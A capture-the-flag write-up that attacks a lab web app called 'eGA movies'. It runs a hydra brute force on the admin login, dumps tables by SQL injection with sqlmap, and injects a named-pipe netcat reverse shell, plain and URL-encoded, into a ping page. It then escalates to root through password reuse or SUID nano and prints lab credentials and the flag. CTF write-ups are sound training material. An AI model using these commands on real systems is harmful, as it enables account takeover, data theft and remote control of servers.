Clicking eGA movies we get link to http://172.17.17.119:3000  The footer tells that we can not create account with username `admin` but lets try and see what hapens  We are getting the error that `possibly duplicate username` So now we have username the issue is finding password. Lets try bruteforce using rockyou wordlist  For me i have two rockyou wordlist one is normal rockyou and the otherone is the reverse of the first one. Always i run them parallel for time saving since we don't know at which line the password is. As above i will show the reverse rockyou part, you can ignore the error or you can strip it off if you like. or just use the command `hydra -l admin -P reverseRockyou.txt 172.17.17.119 -s 3000 http-post-form "/login:name=^USER^&password=^PASS^:F=Invalid credentials" -f -q`  Here we find password as `1234568787`. Now lets login as administrator using credentials we obtain. > username: admin > Password: 1234568787 > For IAA CTF password here will be killer  Here we successfully login as admin and we have the token. Also there is a serch functionality that we can use to search for users using their IDs  When searching id 1 we get user admin, means this function has direct access with the database. Lets try SQLi  The data does not change, now its a time to look of what is happening on the network am going to use burpsuite.  Now on the network we found what hapens with /search: Here there is internal server error that is the strong indication of SQLi also there is a SQL error message `unrecognized token`, Now we are sure that there is a SQLi in this function. Now its a time to exploit SQLi. Simple way is to rightclick the request and save into a file  For me i save it as search. use this command to exploit database `sqlmap -r search --dbs`  Now lets go to tables : `sqlmap -r search --tables`  The interesting one was websites to view the hiden websites. So lets dump thta table : `sqlmap -r search -T Websites --dump`  We get a private url lets view it on the browser : `/svdctyfyfcewiofrwehgtretjguhbkemcvnytj`  We get the page that is used to ping. Lets try to find if we can reach local host.  Its is working. Now its time to check for command injection just use simple command like ls.  Its time for reverse shell - Lets use this command to get the reverse shell `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.17.17.119 9090 >/tmp/f`  Lets try to do url encoding to the above command. It becomes `rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20172.17.17.119%209090%20%3E%2Ftmp%2Ff`  After getting reverse shell there are two ways to get flag 1. exploiting password reuse. Through testing password reuse you will find that the root password is the same as that of admin. ie 1234568787. So just switch user and go for the flag  2. exploit SUID binaries.  You will view the flag or escalate privilege as explains in https://gtfobins.github.io/gtfobins/nano/#sudo > Flag : RIDC{6dcd4ce23d88e2ee9568ba546c007c63d9131c1b8b5e26c5f1f4c0e4e5f2f5f0}